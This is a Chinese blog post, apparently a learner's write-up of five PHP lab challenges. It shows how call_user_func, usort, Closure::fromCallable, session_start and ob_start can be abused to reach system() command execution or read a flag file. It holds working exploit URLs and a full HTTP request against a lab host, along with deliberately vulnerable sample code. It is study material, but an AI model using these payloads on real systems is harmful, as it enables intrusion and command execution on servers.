记一次学习--webshell绕过

最新推荐文章于 2024-08-31 23:13:29 发布
最新推荐文章于 2024-08-31 23:13:29 发布
阅读量638 收藏 4
点赞数 10
文章标签: 渗透学习 学习 php webshell绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/banliyaoguai/article/details/141729082
版权

目录

第一题

第二题

第三题

第四题

第五题

第一题

<?php

$action = $_GET['action'];
$parameters = $_GET;
if (isset($parameters['action'])) {
    unset($parameters['action']);
}

$a = call_user_func($action, ...$parameters);

上面题目,下面的call_user_func有一个可变长参数,这个可变长参数是$parameters然后上面有一个if语句判断$parameters是否有action,如果有就删除掉,然后再action参数传system,在parameters传你要执行的命令

http://192.168.244.152:8080/webshell/1.php?action=system&1=pwd

或者利用usort

http://192.168.244.152:8080/webshell/1.php?action=usort&0[0]=system&0[1]=pwd&1=call_user_func

第二题

<?php

$action = $_GET['action'];
$parameters = $_GET;
if (isset($parameters['action'])) {
    unset($parameters['action']);
}

call_user_func($action, $parameters)($_POST['a'])($_POST['b']);

首先这里$action和$parameters传递current,然后post传参的时候a传数组systemb传你要执行的命令,这里就是action传递的current被call_user_func调用,然后返回了$parameters的current,此时的$parameters是一个数组,数组中的值正是current,然后action的current返回了$parameters的current,现在就成了current(($_POST['a'])($_POST['b'])),然后a传递的也是一个数组a中的值被取出来是system,然后执行了b里面的命令如下图

POST /webshell/2.php?action=current&a=current HTTP/1.1
Host: 192.168.244.152:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

a[]=system&b=pwd

 另外一种解法

action=Closure::fromCallable&0=Closure&1=fromCallable

a=system&b=pwd

Closuer::fromCallable作用是将callable转化成闭包,然后上面传递的action传递Closuer::fromCallable将$parametersClosuer的fromCallable方法又执行了一手,然后又执行了system和你要执行的命令

第三题

<?php
$action = $_GET['action'];
$parameters = $_GET;
if (isset($parameters['action'])) {
    unset($parameters['action']);
}

call_user_func($action, $parameters);


if(count(glob(__DIR__.'/*'))>3){
    readfile('flag.txt');
}

?>

这道题目要读取flag,且当前目录下的文件数目要大于三才可以读取,然后这里的思路就是创建文件。为啥不能像第一题一样直接传递。这个是因为第一题有一个可变长参数,然后将传递的值展开单个传递。但是第二题是直接将$parameters以一个数组的方式传递进去。所以第一题的方案不适合第三题。所以这里我们的思路就是创建文件。然后我们尝试输入一个错误参数,这里给到了物理路径。(这里就是入侵的一个小思路,有可能你以后遇到的代码,并且你可以控制一些页面元素。你就可以输入一个错误参数,让他报错就有可能将对方的物理路径爆出了)。

创建文件利用session_start。然后利用session_start的一个参数,修改session上传零食文件文件的目录,将上传的目录修改成刚刚爆出来的物理路径

然后我们写入

http://192.168.244.152:8080/webshell/3/3.php?action=session_start&save_path=/var/www/html/webshell/3

但是上面写入一个文件也只写入了一个文件,还没有达到代码的要求。那么再写入一个怎么办呢。我们修改一个cookie就可以再生成一个了,flag成功拿到

第四题

<?php
Class A{
    static function f(){
        system($_POST['a']);
    }
}


$action = $_GET['action'];
$parameters = $_GET;
if (isset($parameters['action'])) {
unset($parameters['action']);
}

call_user_func($action, $parameters);

这里就是要利用这个A这个类里卖弄的f方法,然后call_user_func可以直接调用类方法,然后这里使用下面参数

action=call_user_func&0=A&1=f

如下call_user_func调用类的里面的方法的例子

抓包传参

第五题

<?php
Class A{
    static function f(string $a){
        system($a);
    }
}


$action = $_GET['action'];
$parameters = $_GET;
if (isset($parameters['action'])) {
unset($parameters['action']);
}

call_user_func($action, $parameters);
echo $_POST['a'];

 我们这里也要想办法利用A中的f,这个就要利用ob_start,ob_start调用例子,这里和call_user_func调用差不多。只不过把call_user_func改成了ob_start

使用这个样本没有成功,但是其他同学成功了,怀疑是版本的问题

板栗妖怪
关注
  • 10
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络安全:绕过 MSF 的一次渗透测试
yinjiyufei的博客
11-23 666
绕过MSF的一次渗透测试!【网络安全】
一次学习--webshell绕过(动态检测)
最新发布
banliyaoguai的博客
09-01 408
不断学习,不断进步快就是慢,慢就是快。审视自身。
upload-labs学习
qq_41260930的博客
11-29 3189
文章目录1. 基础知识1.1. 简介1.2. 原理1.3. 危害1.4. 常见的文件上传的检测方法与绕过策略1.4.1. 客户端1.4.1.1. Javascript检测1.4.1.1.1. 绕过策略(更改数据包内容)1.4.2. 服务端1.4.2.1. MIME类型检测(Content-Type检测)1.4.2.1.1. 绕过策略(更改数据包内容)1.4.2.2. 文件内容检测1.4.2.2.1...
应急响应-webshell查杀
网络安全
07-08 916
玄机靶场地址:https://xj.edisec.net第一章 应急响应-webshell查杀1.黑客webshell里面的flag flag{xxxxx-xxxx-xxxx-xxxx-xxxx} 2.黑客使用的什么工具的shell github地址的md5 flag{md5} 3.黑客隐藏shell的完整路径的md5 flag{md5} 注 : /xxx/xxx/xxx/xxx/xxx.xx...
一次绕过安全狗与360艰难提权
XunanSec的博客
06-07 1901
端午短暂休息三天,复工之后朋友又丢给我一个,在打台球途中了解了一下这个奇怪的,说是无法执行命令,经过测试发现只能执行命令,确实奇怪,草草打了几局台球就回去拿起电脑开日菜刀上面写着当前用户为,但是执行任何命令都没有回显,要不是这个可以上传下载浏览文件,我都怀疑这个是假的了难道是禁用了高危函数吗?查看发现也没禁用呀至于这种没有任何回显的,一时间有点不知所措,那么就先翻一下文件吧(这是在没有思路情况下的一种思路) 顺便也可以了解目标机器的环境,是否存在杀软,是否宝塔面板搭建的等等......每一个环境都有每一种思
两个webshell管理和生成工具的学习(一)
qq_41810304的博客
01-09 3680
两个webshell管理和生成工具的学习之weevely学习
一些基础的入侵绕过姿势案例分析
si1ence的博客
01-20 686
0x0 背景 谈论起溯源本质上是安全人员对多源数据的一些关联分析,结合自己的经验对攻击者手法路径的还原。所谓的数据来源主要还是流量层面的安全告警(依赖于WAF、IPS一类的设备的检出能力)、流量层面设备的审计录(录所有的网络行为)、主机层面的日志(系统日志、中间件日志、数据库日志等),简单分享一些在实际场景中遇见的一些比较有意思的场景; 0x1 Shiro场景 Apache Shiro Java反序列化是今年比较热门的漏洞之一;Shiro提供了住我(RememberMe)的功能对...
一次docker逃逸学习
hongduilanjun的博客
03-23 4513
本文首发于先知社区:https://xz.aliyun.com/t/9966 一次docker逃逸拿shell的靶场渗透。 环境搭建 靶场: ubuntu 内网ip:192.168.183.10 外网ip:192.168.1.6 域内主机: win7:192.168.183.129 win2008:192.168.183.130 需手动开启ubuntu的docker环境,对应的端口服务如下 2001 struts2 2002 tomcat8 2003 phpmyadmin 4.8.1 外网打点 端
一次有点抽象的渗透经历
2401_84466224的博客
08-04 1428
但是问题来了,2个g的文件怎么上传到服务器又是一个问题,这里就要说明一下\x00的好处了,可以通过压缩成zip的方式把exe压缩,压缩文件的体积其实还是和之前编译好的文件差不多大。看得出来也是一个年久失修的系统了,图片的链接都已经404了。但是这里得到了一个示例账号zs001,也知道了初始密码是123456(吐槽:果然年久失修了,这个系统就没有输入密码的input,只有一个手机号验证码)。其实有一个比较抽象的技巧,就是当文件足够大之后,杀软的沙箱就不会去运行该程序,从而实现绕过杀软的检测。
渗透测试学习
Tom197的博客
06-08 1413
2.子域名查询 3.NDS2IP 查询IP,可以通过ping域名方式获得。 站长之家也可以获得,得到IP更详细,通过不同服务器访问,得到大致位置。 nslookup 域名 dig 域名 dnsenum 域名 4.nmap测试 测试服务器所在局域网情况(服务器有哪些设备,开放了什么端口端口),防止一台服务器被攻陷,再延续到局域网其他服务器,nmap -sp 地址。 nmap -O 查询这一网络中每一台设备是什么系统 。AWVS ——new scan 输入网站地址,得到所有漏洞的信息,点击相应漏洞,右侧出
CSRF学习以及一些绕过referer的方法
不想当脚本小子的脚本小子
01-23 2476
跨站请求伪造,原理:——两个关键点:跨站点的请求以及请求是伪造的 攻击者盗用了用户的身份,以用户的名义发送恶意请求,对服务器来说这个请求是完全合法的,但是却完成了攻击者所期望的一个操作 1. 用户C打开浏览器,访问受信任网站A,输入用户名和密码请求登录网站A; 2.在用户信息通过验证后,网站A产生Cookie信息并返回给浏览器,此时用户登录网站A成功,可以正常发送请求到网站A; 3. 用户未退出网站A之前,在同一浏览器中,打开一个TAB页访问网站B; 4. 网站B接收到用户请求后,返回一些攻击性代
渗透测试之waf绕过基础
qi_SJQ_的博客
01-28 3791
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 思维导图 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 思维导图: 一、信息收集 此处只针对对于目标网站直接扫描的信息收集讲解,其他辅助信息收集手段如:查旁站/识别cms等手段也不会遇到waf拦截。 1.安全狗—防ddos cenos目前用的不熟练,于是我将服务器系统换成了winserver,搭建上web环境和安全狗,打开cc拦截开关,本地.
SQL注入绕过WAF方法使用
m0_55563900的博客
03-13 2242
介绍WAF WAF (Web Application Firewall, Web应用防火墙)及与其相关的知识,这里利用国际上公认的一种说法: Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专]为Web应用提供保护的一款产品。 WAF可以分为以下几类 1.软件型WAF 以软件形式装在所保护的服务器上的WAF,由于安装在服务器上,所以可以接触到服务器上的文件,直接检测服务器上是否存在WebShell、是否有文件被创建等。 2.硬件型WAF 以硬件形式部署在链路中,支持多种部署方式,当串联到
12306项目学习(框架篇Base)
qq_74851649的博客
08-30 484
首先学习的是基础框架提供了一种静态方式来访问Spring容器中的Bean,适用于某些特定场景,如工具类和框架集成。在12306项目中由于我们引入了RocketMQ消息队列,这些库的对象通常不是Spring管理的,无法直接使用@Autowired注入,所以需要类提供一种静态方式来访问Spring容器中的Bean。比如在我们的TicketServiceImpl中的bean对象就是用以下方法获取的。
软件测试学习丨Pytest配置文件
ceshiren_com的博客
08-27 3379
pytest.ini是pytest的配置文件;可以修改pytest的默认行为;不能使用任何中文符号,包括汉字、空格、引号、冒号等。
Datawhale X 李宏毅苹果书AI夏令营 学习
m0_61049596的博客
08-31 393
今天,我继续学习了深度学习中的优化算法,并且着重理解了如何利用。等高级优化器来提高模型训练的效率和效果。2024年8月30日。
AI实践与学习8-AI Agent Workflow助力解题和验证答案置信度
xiaosi的博客
08-30 352
之前在试着提高解题正确率,目标100%,发现外部知识不足仅依靠大模型的话比较困难。而试题人工生产成本巨大。本质因为大模型生成内容会有幻觉特点,也就是说解答的试题正确性不太好评判,直接解答试题生产场景不太可控。后面考虑调用OpenAI解题的时候,像xxx那样通过输出置信度来帮助判断答案的正确性 or 其他形式只要能保证LLM生成答案是可靠(程序判断)的。
如何学习自动化测试工具!
qq_43371695的博客
08-28 871
学习和掌握自动化测试工具的使用方法,可以按照以下步骤进行:一、明确学习目标 首先,需要明确你想要学习哪种自动化测试工具。自动化测试工具种类繁多,包括但不限于Selenium、Appium、JMeter、Postman、Robot Framework等,每种工具都有其特定的使用场景和优势。因此,在选择学习工具时,应结合自己的实际需求和学习目标进行选择。
什么是webshell绕过
07-06
Webshell绕过是指攻击者试图避开网站服务器上部署的Webshell检测机制,以便能够执行恶意脚本或获取对系统更高级别的控制。Webshell通常指黑客植入到网站服务器上的后门工具,用于远程操控服务器。绕过策略可能包括但不限于: 1. 修改文件名或路径:通过改变文件名、隐藏文件或将其放在难以搜索的位置,使得常规安全检查无法找到。 2. 使用编码技术:对文件内容进行加密或者转义,使其看起来像是正常内容,如base64编码或HTML实体转码。 3. 利用异常处理:利用服务器错误页面或者日志分析的漏洞,将Webshell伪装成普通报错信息。 4. 避免黑名单关键词:避免使用常见被检测的关键字,如特定的函数名或敏感字符串。 绕过Webshell检测是为了增加恶意活动的隐蔽性和持久性,保持对系统的控制。不过,防御手段也在不断升级,比如采用更严格的文件完整性检查、访问控制和行为监控等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值